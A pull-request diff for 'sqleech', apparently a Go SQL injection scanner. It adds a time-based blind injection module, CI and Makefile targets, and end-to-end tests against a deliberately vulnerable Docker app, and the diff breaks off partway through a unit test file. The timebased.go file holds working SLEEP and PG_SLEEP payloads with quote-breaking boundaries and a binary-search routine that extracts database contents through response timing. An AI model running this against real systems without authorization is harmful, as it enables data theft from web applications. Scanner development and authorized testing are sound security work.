### PR TITLE
Implement time-based blind SQL injection technique (#30)

### DIFF
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -44,3 +44,22 @@ jobs:
 
       - name: Run staticcheck
         run: staticcheck ./...
+
+  e2e:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v4
+
+      - uses: actions/setup-go@v5
+        with:
+          go-version: '1.26'
+
+      - name: Start Docker test environment
+        run: docker compose -f testenv/docker-compose.yml up -d --build --wait
+
+      - name: Run E2E tests
+        run: go test -v -tags e2e -count=1 -timeout 120s ./e2e/...
+
+      - name: Teardown Docker environment
+        if: always()
+        run: docker compose -f testenv/docker-compose.yml down

--- a/.semgrepignore
+++ b/.semgrepignore
@@ -1,0 +1,3 @@
+# testenv/vulnapp is an intentionally vulnerable application used for testing sqleech.
+# All SQL injection and XSS findings here are by design.
+testenv/vulnapp/

--- a/Makefile
+++ b/Makefile
@@ -4,7 +4,7 @@ COMMIT=$(shell git rev-parse --short HEAD 2>/dev/null || echo "none")
 DATE=$(shell date -u +"%Y-%m-%dT%H:%M:%SZ")
 LDFLAGS=-ldflags "-X github.com/0x6d61/sqleech/internal/cli.version=$(VERSION) -X github.com/0x6d61/sqleech/internal/cli.commit=$(COMMIT) -X github.com/0x6d61/sqleech/internal/cli.date=$(DATE)"
 
-.PHONY: build test lint clean run vet fmt
+.PHONY: build test lint clean run vet fmt e2e-up e2e-down e2e-test e2e
 
 build:
 	go build $(LDFLAGS) -o bin/$(BINARY_NAME) ./cmd/sqleech
@@ -39,3 +39,15 @@ clean:
 	rm -rf bin/ coverage.out coverage.html
 
 all: fmt vet lint test build
+
+# E2E test targets (requires Docker)
+e2e-up:
+	docker compose -f testenv/docker-compose.yml up -d --build --wait
+
+e2e-down:
+	docker compose -f testenv/docker-compose.yml down
+
+e2e-test:
+	go test -v -tags e2e -count=1 -timeout 120s ./e2e/...
+
+e2e: e2e-up e2e-test e2e-down

--- a/e2e/e2e_test.go
+++ b/e2e/e2e_test.go
@@ -1,0 +1,475 @@
+//go:build e2e
+
+// Package e2e contains end-to-end tests that require the Docker test
+// environment defined in testenv/docker-compose.yml.
+//
+// Run with:
+//
+//	make e2e
+//
+// Or manually:
+//
+//	cd testenv && docker compose up -d --build --wait
+//	go test -v -tags e2e -count=1 -timeout 120s ./e2e/...
+package e2e_test
+
+import (
+	"context"
+	"net/http"
+	"os"
+	"strings"
+	"testing"
+	"time"
+
+	"github.com/0x6d61/sqleech/internal/detector"
+	"github.com/0x6d61/sqleech/internal/engine"
+	"github.com/0x6d61/sqleech/internal/fingerprint"
+	"github.com/0x6d61/sqleech/internal/technique"
+	"github.com/0x6d61/sqleech/internal/technique/boolean"
+	"github.com/0x6d61/sqleech/internal/technique/errorbased"
+	"github.com/0x6d61/sqleech/internal/technique/timebased"
+	"github.com/0x6d61/sqleech/internal/transport"
+)
+
+const defaultE2EURL = "http://localhost:18080"
+
+// e2eBaseURL returns the base URL of the test environment.
+// If the server is unreachable, the test is skipped automatically.
+func e2eBaseURL(t *testing.T) string {
+	t.Helper()
+	url := os.Getenv("SQLEECH_E2E_URL")
+	if url == "" {
+		url = defaultE2EURL
+	}
+
+	ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
+	defer cancel()
+
+	req, err := http.NewRequestWithContext(ctx, http.MethodGet, url+"/health", nil)
+	if err != nil {
+		t.Skipf("cannot build health-check request for %s: %v", url, err)
+	}
+	resp, err := http.DefaultClient.Do(req)
+	if err != nil || resp.StatusCode != http.StatusOK {
+		t.Skipf("E2E server not available at %s (start with: make e2e-up): %v", url, err)
+	}
+	return url
+}
+
+// newE2EClient creates a real HTTP transport client suitable for E2E testing.
+func newE2EClient(t *testing.T) transport.Client {
+	t.Helper()
+	client, err := transport.NewClient(transport.ClientOptions{
+		Timeout:         30 * time.Second,
+		FollowRedirects: true,
+	})
+	if err != nil {
+		t.Fatalf("failed to create transport client: %v", err)
+	}
+	return client
+}
+
+// --------------------------------------------------------------------------
+// Dependency-injection adapters (mirror of internal/testutil/integration_test.go)
+// --------------------------------------------------------------------------
+
+type techniqueAdapter struct {
+	inner technique.Technique
+}
+
+func (a *techniqueAdapter) Name() string  { return a.inner.Name() }
+func (a *techniqueAdapter) Priority() int { return a.inner.Priority() }
+func (a *techniqueAdapter) Detect(ctx context.Context, req *engine.TechniqueRequest) (*engine.DetectionResult, error) {
+	innerReq := &technique.InjectionRequest{
+		Target:    req.Target,
+		Parameter: req.Parameter,
+		Baseline:  req.Baseline,
+		DBMS:      req.DBMS,
+		Client:    req.Client,
+	}
+	r, err := a.inner.Detect(ctx, innerReq)
+	if err != nil {
+		return nil, err
+	}
+	dr := &engine.DetectionResult{
+		Injectable: r.Injectable,
+		Confidence: r.Confidence,
+		Technique:  r.Technique,
+		Evidence:   r.Evidence,
+	}
+	if r.Payload != nil {
+		dr.Payload = r.Payload.String()
+	}
+	return dr, nil
+}
+
+func wrapTechniques(techs ...technique.Technique) []engine.Technique {
+	out := make([]engine.Technique, len(techs))
+	for i, t := range techs {
+		out[i] = &techniqueAdapter{inner: t}
+	}
+	return out
+}
+
+func makeHeuristicFunc(client transport.Client) engine.HeuristicDetectorFunc {
+	diffEng := detector.NewDiffEngine()
+	return func(ctx context.Context, target *engine.ScanTarget) ([]engine.HeuristicResult, error) {
+		hd := detector.NewHeuristicDetector(client, diffEng)
+		results, err := hd.DetectAll(ctx, target)
+		if err != nil {
+			return nil, err
+		}
+		out := make([]engine.HeuristicResult, len(results))
+		for i, r := range results {
+			out[i] = engine.HeuristicResult{
+				Parameter:       r.Parameter,
+				Baseline:        r.Baseline,
+				CausesError:     r.CausesError,
+				DynamicContent:  r.DynamicContent,
+				ErrorSignatures: r.ErrorSignatures,
+				PageRatio:       r.PageRatio,
+				IsInjectable:    r.IsInjectable,
+			}
+		}
+		return out, nil
+	}
+}
+
+func makeDBMSIdentifier() engine.DBMSIdentifierFunc {
+	return func(errorSignatures map[string][]string) *engine.DBMSInfo {
+		info := fingerprint.IdentifyFromErrors(errorSignatures)
+		if info == nil {
+			return nil
+		}
+		return &engine.DBMSInfo{
+			Name:       info.Name,
+			Version:    info.Version,
+			Banner:     info.Banner,
+			Confidence: info.Confidence,
+		}
+	}
+}
+
+func makeFingerprinter() engine.FingerprintFunc {
+	registry := fingerprint.NewRegistry()
+	return func(ctx context.Context, target *engine.ScanTarget, param *engine.Parameter, baseline *transport.Response, client transport.Client) (*engine.DBMSInfo, error) {
+		info, err := registry.Identify(ctx, &fingerprint.FingerprintRequest{
+			Target:    target,
+			Parameter: param,
+			Baseline:  baseline,
+			Client:    client,
+		})
+		if err != nil {
+			return nil, err
+		}
+		if info == nil {
+			return nil, nil
+		}
+		return &engine.DBMSInfo{
+			Name:       info.Name,
+			Version:    info.Version,
+			Banner:     info.Banner,
+			Confidence: info.Confidence,
+		}, nil
+	}
+}
+
+func makeParamParser() engine.ParameterParser {
+	return func(rawURL, body, contentType string) []engine.Parameter {
+		return detector.ParseParameters(rawURL, body, contentType)
+	}
+}
+
+func newFullScanner(client transport.Client, config *engine.ScanConfig) *engine.Scanner {
+	return engine.NewScanner(client, config,
+		engine.WithTechniques(wrapTechniques(errorbased.New(), boolean.New(), timebased.New())...),
+		engine.WithParameterParser(makeParamParser()),
+		engine.WithHeuristicDetector(makeHeuristicFunc(client)),
+		engine.WithDBMSIdentifier(makeDBMSIdentifier()),
+		engine.WithFingerprinter(makeFingerprinter()),
+	)
+}
+
+// --------------------------------------------------------------------------
+// E2E Tests
+// --------------------------------------------------------------------------
+
+func TestE2E_MySQL_ErrorBased(t *testing.T) {
+	base := e2eBaseURL(t)
+	client := newE2EClient(t)
+	scanner := newFullScanner(client, engine.DefaultScanConfig())
+
+	target := &engine.ScanTarget{
+		URL:    base + "/mysql/user?id=1",
+		Method: http.MethodGet,
+	}
+
+	ctx := context.Background()
+	result, err := scanner.Scan(ctx, target)
+	if err != nil {
+		t.Fatalf("scan failed: %v", err)
+	}
+
+	var foundInjectable, foundErrorBased bool
+	for _, vuln := range result.Vulnerabilities {
+		if vuln.Injectable {
+			foundInjectable = true
+			if vuln.Technique == "error-based" {
+				foundErrorBased = true
+			}
+		}
+	}
+
+	if !foundInjectable {
+		t.Error("expected at least 1 injectable vulnerability")
+	}
+	if !foundErrorBased {
+		t.Error("expected error-based technique to detect the vulnerability")
+	}
+	if !strings.Contains(result.DBMS, "MySQL") {
+		t.Errorf("DBMS = %q, want to contain 'MySQL'", result.DBMS)
+	}
+	t.Logf("DBMS: %s, request count: %d", result.DBMS, result.RequestCount)
+}
+
+func TestE2E_PostgreSQL_ErrorBased(t *testing.T) {
+	base := e2eBaseURL(t)
+	client := newE2EClient(t)
+	scanner := newFullScanner(client, engine.DefaultScanConfig())
+
+	target := &engine.ScanTarget{
+		URL:    base + "/pg/user?id=1",
+		Method: http.MethodGet,
+	}
+
+	ctx := context.Background()
+	result, err := scanner.Scan(ctx, target)
+	if err != nil {
+		t.Fatalf("scan failed: %v", err)
+	}
+
+	var foundInjectable bool
+	for _, vuln := range result.Vulnerabilities {
+		if vuln.Injectable {
+			foundInjectable = true
+			break
+		}
+	}
+
+	if !foundInjectable {
+		t.Error("expected at least 1 injectable vulnerability for PostgreSQL endpoint")
+	}
+	if !strings.Contains(result.DBMS, "PostgreSQL") {
+		t.Errorf("DBMS = %q, want to contain 'PostgreSQL'", result.DBMS)
+	}
+	t.Logf("DBMS: %s, request count: %d", result.DBMS, result.RequestCount)
+}
+
+func TestE2E_MySQL_SearchEndpoint(t *testing.T) {
+	base := e2eBaseURL(t)
+	client := newE2EClient(t)
+	scanner := newFullScanner(client, engine.DefaultScanConfig())
+
+	// LIKE '%<q>%' context injection
+	target := &engine.ScanTarget{
+		URL:    base + "/mysql/search?q=widget",
+		Method: http.MethodGet,
+	}
+
+	ctx := context.Background()
+	result, err := scanner.Scan(ctx, target)
+	if err != nil {
+		t.Fatalf("scan failed: %v", err)
+	}
+
+	var foundInjectable bool
+	for _, vuln := range result.Vulnerabilities {
+		if vuln.Injectable {
+			foundInjectable = true
+			break
+		}
+	}
+
+	if !foundInjectable {
+		t.Error("expected injection to be detected in LIKE-context search endpoint")
+	}
+	t.Logf("vulnerabilities: %d, request count: %d", len(result.Vulnerabilities), result.RequestCount)
+}
+
+func TestE2E_PostgreSQL_SearchEndpoint(t *testing.T) {
+	base := e2eBaseURL(t)
+	client := newE2EClient(t)
+	scanner := newFullScanner(client, engine.DefaultScanConfig())
+
+	// ILIKE '%<q>%' context injection
+	target := &engine.ScanTarget{
+		URL:    base + "/pg/search?q=widget",
+		Method: http.MethodGet,
+	}
+
+	ctx := context.Background()
+	result, err := scanner.Scan(ctx, target)
+	if err != nil {
+		t.Fatalf("scan failed: %v", err)
+	}
+
+	var foundInjectable bool
+	for _, vuln := range result.Vulnerabilities {
+		if vuln.Injectable {
+			foundInjectable = true
+			break
+		}
+	}
+
+	if !foundInjectable {
+		t.Error("expected injection to be detected in ILIKE-context search endpoint")
+	}
+	t.Logf("vulnerabilities: %d, request count: %d", len(result.Vulnerabilities), result.RequestCount)
+}
+
+func TestE2E_SafeEndpoint(t *testing.T) {
+	base := e2eBaseURL(t)
+	client := newE2EClient(t)
+	scanner := newFullScanner(client, engine.DefaultScanConfig())
+
+	// Parameterized query — should NOT be detected as injectable
+	target := &engine.ScanTarget{
+		URL:    base + "/safe/mysql/user?id=1",
+		Method: http.MethodGet,
+	}
+
+	ctx := context.Background()
+	result, err := scanner.Scan(ctx, target)
+	if err != nil {
+		t.Fatalf("scan failed: %v", err)
+	}
+
+	for _, vuln := range result.Vulnerabilities {
+		if vuln.Injectable {
+			t.Errorf("false positive: safe endpoint reported injectable (param=%s, technique=%s)",
+				vuln.Parameter.Name, vuln.Technique)
+		}
+	}
+	t.Logf("injectable count: 0 (expected), request count: %d", result.RequestCount)
+}
+
+func TestE2E_POST_MySQL(t *testing.T) {
+	base := e2eBaseURL(t)
+	client := newE2EClient(t)
+	scanner := newFullScanner(client, engine.DefaultScanConfig())
+
+	target := &engine.ScanTarget{
+		URL:         base + "/mysql/login",
+		Method:      http.MethodPost,
+		Body:        "username=admin&password=secret",
+		ContentType: "application/x-www-form-urlencoded",
+	}
+
+	ctx := context.Background()
+	result, err := scanner.Scan(ctx, target)
+	if err != nil {
+		t.Fatalf("scan failed: %v", err)
+	}
+
+	var foundInjectable bool
+	for _, vuln := range result.Vulnerabilities {
+		if vuln.Injectable {
+			foundInjectable = true
+			break
+		}
+	}
+
+	if !foundInjectable {
+		t.Error("expected injection to be detected in POST login endpoint")
+		t.Logf("vulnerabilities found: %d", len(result.Vulnerabilities))
+		for _, v := range result.Vulnerabilities {
+			t.Logf("  param=%s technique=%s injectable=%v", v.Parameter.Name, v.Technique, v.Injectable)
+		}
+	}
+	t.Logf("request count: %d", result.RequestCount)
+}
+
+func TestE2E_TimeBased_MySQL(t *testing.T) {
+	base := e2eBaseURL(t)
+	client := newE2EClient(t)
+
+	// Use a dedicated time-based scanner with ForceTest=true.
+	// The /mysql/sleep endpoint only differs in response TIME, not content,
+	// so heuristics would skip it without ForceTest.
+	cfg := engine.DefaultScanConfig()
+	cfg.ForceTest = true
+	scanner := engine.NewScanner(client, cfg,
+		engine.WithTechniques(wrapTechniques(timebased.New())...),
+		engine.WithParameterParser(makeParamParser()),
+		engine.WithHeuristicDetector(makeHeuristicFunc(client)),
+		engine.WithDBMSIdentifier(makeDBMSIdentifier()),
+		engine.WithFingerprinter(makeFingerprinter()),
+	)
+
+	target := &engine.ScanTarget{
+		URL:    base + "/mysql/sleep?id=1",
+		Method: http.MethodGet,
+	}
+
+	ctx := context.Background()
+	result, err := scanner.Scan(ctx, target)
+	if err != nil {
+		t.Fatalf("scan failed: %v", err)
+	}
+
+	var foundTimeBased bool
+	for _, vuln := range result.Vulnerabilities {
+		if vuln.Injectable && vuln.Technique == "time-based" {
+			foundTimeBased = true
+		}
+	}
+
+	if !foundTimeBased {
+		t.Error("expected time-based injection to be detected on /mysql/sleep")
+		for _, v := range result.Vulnerabilities {
+			t.Logf("  param=%s technique=%s injectable=%v", v.Parameter.Name, v.Technique, v.Injectable)
+		}
+	}
+	t.Logf("request count: %d", result.RequestCount)
+}
+
+func TestE2E_TimeBased_PostgreSQL(t *testing.T) {
+	base := e2eBaseURL(t)
+	client := newE2EClient(t)
+
+	cfg := engine.DefaultScanConfig()
+	cfg.ForceTest = true
+	scanner := engine.NewScanner(client, cfg,
+		engine.WithTechniques(wrapTechniques(timebased.New())...),
+		engine.WithParameterParser(makeParamParser()),
+		engine.WithHeuristicDetector(makeHeuristicFunc(client)),
+		engine.WithDBMSIdentifier(makeDBMSIdentifier()),
+		engine.WithFingerprinter(makeFingerprinter()),
+	)
+
+	target := &engine.ScanTarget{
+		URL:    base + "/pg/sleep?id=1",
+		Method: http.MethodGet,
+	}
+
+	ctx := context.Background()
+	result, err := scanner.Scan(ctx, target)
+	if err != nil {
+		t.Fatalf("scan failed: %v", err)
+	}
+
+	var foundTimeBased bool
+	for _, vuln := range result.Vulnerabilities {
+		if vuln.Injectable && vuln.Technique == "time-based" {
+			foundTimeBased = true
+		}
+	}
+
+	if !foundTimeBased {
+		t.Error("expected time-based injection to be detected on /pg/sleep")
+		for _, v := range result.Vulnerabilities {
+			t.Logf("  param=%s technique=%s injectable=%v", v.Parameter.Name, v.Technique, v.Injectable)
+		}
+	}
+	t.Logf("request count: %d", result.RequestCount)
+}

--- a/internal/technique/timebased/timebased.go
+++ b/internal/technique/timebased/timebased.go
@@ -1,0 +1,439 @@
+// Package timebased implements the time-based blind SQL injection technique.
+//
+// Time-based blind injection works by measuring the response time of the server.
+// By injecting a conditional sleep expression (e.g., IF(1=1,SLEEP(5),0) for MySQL),
+// the technique can determine whether a parameter is injectable:
+//
+//   - Delayed response: the condition was evaluated server-side → injectable
+//   - Immediate response: the input was not interpreted as SQL → not injectable
+//
+// This is the technique of last resort when error-based and boolean-blind methods
+// are not applicable (no error messages, no page content difference).
+//
+// Supported DBMS:
+//   - MySQL:      IF(condition, SLEEP(n), 0)
+//   - PostgreSQL: (SELECT CASE WHEN (condition) THEN (SELECT 1 FROM PG_SLEEP(n)) ELSE 1 END)
+package timebased
+
+import (
+	"context"
+	"fmt"
+	"net/url"
+	"time"
+
+	"github.com/0x6d61/sqleech/internal/dbms"
+	"github.com/0x6d61/sqleech/internal/engine"
+	"github.com/0x6d61/sqleech/internal/payload"
+	"github.com/0x6d61/sqleech/internal/technique"
+	"github.com/0x6d61/sqleech/internal/transport"
+)
+
+const (
+	// defaultSleepSeconds is the number of seconds to sleep in each probe.
+	defaultSleepSeconds = 5
+
+	// defaultTolerance is the fraction of sleepSeconds the response must exceed
+	// above baseline to be considered delayed.
+	// e.g., sleep=5s, tolerance=0.7 → threshold = baseline + 3.5s
+	defaultTolerance = 0.7
+
+	// baselineSamples is the number of requests to average for baseline timing.
+	baselineSamples = 2
+
+	// asciiLow / asciiHigh define the printable ASCII range for extraction.
+	asciiLow  = 32
+	asciiHigh = 126
+
+	// maxExtractLength caps the extraction to prevent infinite loops.
+	maxExtractLength = 512
+)
+
+// boundaryPair represents a prefix/suffix combination to escape the SQL context.
+type boundaryPair struct {
+	prefix string
+	suffix string
+}
+
+// defaultBoundaries lists prefix/suffix pairs tried during detection.
+var defaultBoundaries = []boundaryPair{
+	{"", "-- -"},
+	{"'", "-- -"},
+	{"\"", "-- -"},
+	{")", "-- -"},
+	{"')", "-- -"},
+}
+
+// TimeBased implements the time-based blind SQL injection technique.
+type TimeBased struct {
+	sleepSeconds int
+	tolerance    float64
+}
+
+// New creates a TimeBased technique with production-safe defaults.
+func New() *TimeBased {
+	return &TimeBased{
+		sleepSeconds: defaultSleepSeconds,
+		tolerance:    defaultTolerance,
+	}
+}
+
+// NewWithConfig creates a TimeBased technique with custom parameters.
+// Intended for testing with shorter sleep intervals.
+func NewWithConfig(sleepSeconds int, tolerance float64) *TimeBased {
+	return &TimeBased{
+		sleepSeconds: sleepSeconds,
+		tolerance:    tolerance,
+	}
+}
+
+// Name returns "time-based".
+func (t *TimeBased) Name() string { return "time-based" }
+
+// Priority returns 3 (after error-based=1, boolean-blind=2).
+func (t *TimeBased) Priority() int { return 3 }
+
+// Detect tests whether a parameter is injectable using response timing.
+//
+// Algorithm:
+//  1. Measure average baseline response time (2 samples).
+//  2. Compute delay threshold = baseline + sleepSeconds * tolerance.
+//  3. For each boundary pair, send:
+//     a. Sleep probe  (IF TRUE → sleep)  → expect duration >= threshold.
+//     b. No-sleep probe (IF FALSE → no sleep) → expect duration < threshold.
+//  4. Confirm with one more sleep probe to reduce false positives from network lag.
+func (t *TimeBased) Detect(ctx context.Context, req *technique.InjectionRequest) (*technique.DetectionResult, error) {
+	result := &technique.DetectionResult{Technique: t.Name()}
+
+	d := findDBMS(req.DBMS)
+
+	baseline, err := measureBaseline(ctx, req)
+	if err != nil {
+		// If we can't establish baseline, skip gracefully.
+		return result, nil
+	}
+
+	threshold := baseline + time.Duration(float64(t.sleepSeconds)*t.tolerance*float64(time.Second))
+
+	for _, bp := range defaultBoundaries {
+		// Build the TRUE (sleep) probe and FALSE (no-sleep) probe.
+		sleepCore := sleepPayloadFor(d, "1=1", t.sleepSeconds)
+		noSleepCore := sleepPayloadFor(d, "1=2", t.sleepSeconds)
+
+		// Probe 1: expect delay.
+		dur1, err := t.sendTimedProbe(ctx, req, sleepCore, bp.prefix, bp.suffix)
+		if err != nil {
+			continue
+		}
+		if dur1 < threshold {
+			continue // No delay detected, try next boundary.
+		}
+
+		// Probe 2: expect NO delay (confirmation that we control the sleep).
+		dur2, err := t.sendTimedProbe(ctx, req, noSleepCore, bp.prefix, bp.suffix)
+		if err != nil {
+			continue
+		}
+		if dur2 >= threshold {
+			// Still delayed on false condition — likely server-side lag, not injection.
+			continue
+		}
+
+		// Probe 3: final confirmation round.
+		dur3, err := t.sendTimedProbe(ctx, req, sleepCore, bp.prefix, bp.suffix)
+		if err != nil || dur3 < threshold {
+			continue
+		}
+
+		// All rounds consistent — injectable.
+		result.Injectable = true
+		result.Confidence = 0.85
+		result.Evidence = fmt.Sprintf(
+			"sleep probe delayed %.2fs (threshold %.2fs, sleep=%ds, baseline=%.2fs)",
+			dur1.Seconds(), threshold.Seconds(), t.sleepSeconds, baseline.Seconds(),
+		)
+		result.Payload = payload.NewBuilder().
+			WithPrefix(bp.prefix).
+			WithCore(" AND " + sleepCore).
+			WithSuffix(bp.suffix).
+			WithTechnique(t.Name()).
+			WithDBMS(d.Name()).
+			Build()
+		return result, nil
+	}
+
+	return result, nil
+}
+
+// Extract retrieves the value of a SQL expression via time-based binary search.
+//
+// Data is extracted character-by-character using a conditional sleep oracle:
+//
+//	IF(ASCII(SUBSTRING((query), pos, 1)) > mid, SLEEP(n), 0)
+//
+// If the response is delayed, the ASCII value > mid (search upper half).
+// If the response is fast, ASCII value <= mid (search lower half).
+func (t *TimeBased) Extract(ctx context.Context, req *technique.ExtractionRequest) (*technique.ExtractionResult, error) {
+	d := findDBMS(req.DBMS)
+
+	baseline, err := measureBaseline(ctx, &req.InjectionRequest)
+	if err != nil {
+		return nil, fmt.Errorf("measuring baseline: %w", err)
+	}
+	threshold := baseline + time.Duration(float64(t.sleepSeconds)*t.tolerance*float64(time.Second))
+
+	prefix, suffix, err := t.findWorkingBoundary(ctx, &req.InjectionRequest, d, threshold)
+	if err != nil {
+		return nil, fmt.Errorf("finding working boundary: %w", err)
+	}
+
+	totalRequests := 0
+
+	// Step 1: Determine result length.
+	length, reqs, err := t.extractLength(ctx, req, d, prefix, suffix, threshold)
+	if err != nil {
+		return nil, fmt.Errorf("extracting length: %w", err)
+	}
+	totalRequests += reqs
+
+	if length == 0 {
+		return &technique.ExtractionResult{Value: "", Requests: totalRequests}, nil
+	}
+
+	// Step 2: Extract each character.
+	var result []byte
+	for pos := 1; pos <= length; pos++ {
+		ch, reqs, err := t.extractChar(ctx, req, d, pos, prefix, suffix, threshold)
+		if err != nil {
+			return &technique.ExtractionResult{
+				Value:    string(result),
+				Partial:  true,
+				Requests: totalRequests,
+			}, fmt.Errorf("extracting char at pos %d: %w", pos, err)
+		}
+		totalRequests += reqs
+		result = append(result, ch)
+	}
+
+	return &technique.ExtractionResult{
+		Value:    string(result),
+		Partial:  false,
+		Requests: totalRequests,
+	}, nil
+}
+
+// --------------------------------------------------------------------------
+// Internal helpers
+// --------------------------------------------------------------------------
+
+// measureBaseline sends baselineSamples requests and returns the average
+// response time. This establishes the "no-sleep" reference point.
+func measureBaseline(ctx context.Context, req *technique.InjectionRequest) (time.Duration, error) {
+	var total time.Duration
+	for range baselineSamples {
+		probeReq := buildProbeRequest(req.Target, req.Parameter, req.Parameter.Value)
+		resp, err := req.Client.Do(ctx, probeReq)
+		if err != nil {
+			return 0, err
+		}
+		total += resp.Duration
+	}
+	return total / baselineSamples, nil
+}
+
+// sendTimedProbe sends a probe and returns the actual response duration.
+func (t *TimeBased) sendTimedProbe(ctx context.Context, req *technique.InjectionRequest, coreExpr, prefix, suffix string) (time.Duration, error) {
+	payloadStr := req.Parameter.Value + prefix + " AND " + coreExpr + " " + suffix
+	probeReq := buildProbeRequest(req.Target, req.Parameter, payloadStr)
+
+	resp, err := req.Client.Do(ctx, probeReq)
+	if err != nil {
+		return 0, err
+	}
+	return resp.Duration, nil
+}
+
+// sleepPayloadFor builds a DBMS-appropriate conditional sleep expression.
+//
+// The returned expression evaluates the given condition:
+//   - If TRUE:  SLEEP(seconds) is called (response delayed)
+//   - If FALSE: no sleep (immediate response)
+//
+// MySQL:      IF(condition, SLEEP(n), 0)
+// PostgreSQL: 1=(CASE WHEN (condition) THEN (SELECT 1 FROM PG_SLEEP(n)) ELSE 1 END)
+// Default:    MySQL syntax
+func sleepPayloadFor(d dbms.DBMS, condition string, seconds int) string {
+	switch d.Name() {
+	case "PostgreSQL":
+		// PG_SLEEP returns void, so we embed it in a SELECT to make it a scalar.
+		// SELECT 1 FROM PG_SLEEP(n) blocks for n seconds then returns 1.
+		return fmt.Sprintf(
+			"1=(CASE WHEN (%s) THEN (SELECT 1 FROM PG_SLEEP(%d)) ELSE 1 END)",
+			condition, seconds,
+		)
+	default:
+		// MySQL (and fallback): IF(condition, SLEEP(n), 0)
+		return fmt.Sprintf("IF(%s,%s,0)", condition, d.SleepFunction(seconds))
+	}
+}
+
+// extractLength determines the length of a query result using binary search.
+// Returns (length, requestCount, error).
+func (t *TimeBased) extractLength(
+	ctx context.Context,
+	req *technique.ExtractionRequest,
+	d dbms.DBMS,
+	prefix, suffix string,
+	threshold time.Duration,
+) (int, int, error) {
+	low := 0
+	high := maxExtractLength
+	requests := 0
+
+	for low < high {
+		mid := (low + high) / 2
+		condition := fmt.Sprintf("%s>%d", d.Length(fmt.Sprintf("(%s)", req.Query)), mid)
+		coreExpr := sleepPayloadFor(d, condition, t.sleepSeconds)
+
+		dur, err := t.sendTimedProbe(ctx, &req.InjectionRequest, coreExpr, prefix, suffix)
+		if err != nil {
+			return 0, requests, err
+		}
+		requests++
+
+		if dur >= threshold {
+			// LENGTH > mid, search upper half.
+			low = mid + 1
+		} else {
+			// LENGTH <= mid, search lower half.
+			high = mid
+		}
+	}
+
+	return low, requests, nil
+}
+
+// extractChar extracts a single character at a 1-based position using binary
+// search on the ASCII value. Returns (character, requestCount, error).
+func (t *TimeBased) extractChar(
+	ctx context.Context,
+	req *technique.ExtractionRequest,
+	d dbms.DBMS,
+	pos int,
+	prefix, suffix string,
+	threshold time.Duration,
+) (byte, int, error) {
+	low := asciiLow
+	high := asciiHigh
+	requests := 0
+
+	for low < high {
+		mid := (low + high) / 2
+		subExpr := d.Substring(fmt.Sprintf("(%s)", req.Query), pos, 1)
+		asciiExpr := d.ASCII(subExpr)
+		condition := fmt.Sprintf("%s>%d", asciiExpr, mid)
+		coreExpr := sleepPayloadFor(d, condition, t.sleepSeconds)
+
+		dur, err := t.sendTimedProbe(ctx, &req.InjectionRequest, coreExpr, prefix, suffix)
+		if err != nil {
+			return 0, requests, err
+		}
+		requests++
+
+		if dur >= threshold {
+			// ASCII > mid, search upper half.
+			low = mid + 1
+		} else {
+			// ASCII <= mid, search lower half.
+			high = mid
+		}
+	}
+
+	return byte(low), requests, nil
+}
+
+// findWorkingBoundary iterates through boundary pairs and returns the first
+// one for which the sleep probe causes a delay above the threshold.
+func (t *TimeBased) findWorkingBoundary(
+	ctx context.Context,
+	req *technique.InjectionRequest,
+	d dbms.DBMS,
+	threshold time.Duration,
+) (string, string, error) {
+	for _, bp := range defaultBoundaries {
+		sleepCore := sleepPayloadFor(d, "1=1", t.sleepSeconds)
+		dur, err := t.sendTimedProbe(ctx, req, sleepCore, bp.prefix, bp.suffix)
+		if err != nil {
+			continue
+		}
+		if dur >= threshold {
+			return bp.prefix, bp.suffix, nil
+		}
+	}
+	return "", "-- -", fmt.Errorf("no working boundary found for time-based extraction")
+}
+
+// findDBMS returns a DBMS implementation by name. Falls back to MySQL.
+func findDBMS(name string) dbms.DBMS {
+	d := dbms.Registry(name)
+	if d == nil {
+		d = dbms.Registry("MySQL")
+	}
+	return d
+}
+
+// buildProbeRequest creates a transport.Request with the target parameter
+// replaced by the given payload value.
+func buildProbeRequest(target *engine.ScanTarget, param *engine.Parameter, payloadStr string) *transport.Request {
+	req := &transport.Request{
+		Method:      target.Method,
+		URL:         target.URL,
+		Body:        target.Body,
+		ContentType: target.ContentType,
+	}
+
+	if target.Headers != nil {
+		req.Headers = make(map[string]string, len(target.Headers))
+		for k, v := range target.Headers {
+			req.Headers[k] = v
+		}
+	}
+
+	if target.Cookies != nil {
+		req.Cookies = make(map[string]string, len(target.Cookies))
+		for k, v := range target.Cookies {
+			req.Cookies[k] = v
+		}
+	}
+
+	switch param.Location {
+	case engine.LocationQuery:
+		req.URL = modifyQueryParam(target.URL, param.Name, payloadStr)
+	case engine.LocationBody:
+		req.Body = modifyBodyParam(target.Body, param.Name, payloadStr)
+	}
+
+	return req
+}
+
+// modifyQueryParam replaces the value of a named query parameter in the URL.
+func modifyQueryParam(rawURL, paramName, newValue string) string {
+	parsed, err := url.Parse(rawURL)
+	if err != nil {
+		return rawURL
+	}
+	q := parsed.Query()
+	q.Set(paramName, newValue)
+	parsed.RawQuery = q.Encode()
+	return parsed.String()
+}
+
+// modifyBodyParam replaces the value of a named parameter in a
+// application/x-www-form-urlencoded body.
+func modifyBodyParam(body, paramName, newValue string) string {
+	values, err := url.ParseQuery(body)
+	if err != nil {
+		return body
+	}
+	values.Set(paramName, newValue)
+	return values.Encode()
+}

--- a/internal/technique/timebased/timebased_test.go
+++ b/internal/technique/timebased/timebased_test.go
@@ -1,0 +1,242 @@
+package timebased
+
+import (
+	"context"
+	"net/url"
+	"strings"
+	"testing"
+	"time"
+
+	"github.com/0x6d61/sqleech/internal/engine"
+	"github.com/0x6d61/sqleech/internal/technique"
+	"github.com/0x6d61/sqleech/internal/transport"
+)
+
+// --------------------------------------------------------------------------
+// Mock transport client
+// --------------------------------------------------------------------------
+
+// mockTimeClient simulates time-based injection by adding artificial delays
+// when a sleep-triggering payload is detected in the request URL or body.
+// This avoids real network calls and keeps unit tests fast.
+type mockTimeClient struct {
+	// simulatedDelay is the artificial delay added for sleep payloads.
+	simulatedDelay time.Duration
+	// requests counts total requests sent.
+	requests int64
+}
+
+// containsSleepPayload returns true when the request carries a payload that
+// should trigger a database sleep (TRUE condition with SLEEP/PG_SLEEP).
+//
+// The input may be URL-encoded, so it is decoded before matching.
+func containsSleepPayload(s string) bool {
+	// URL-decode to handle query-parameter encoding (SLEEP%28 → SLEEP().
+	decoded, err := url.QueryUnescape(s)
+	if err != nil {
+		decoded = s
+	}
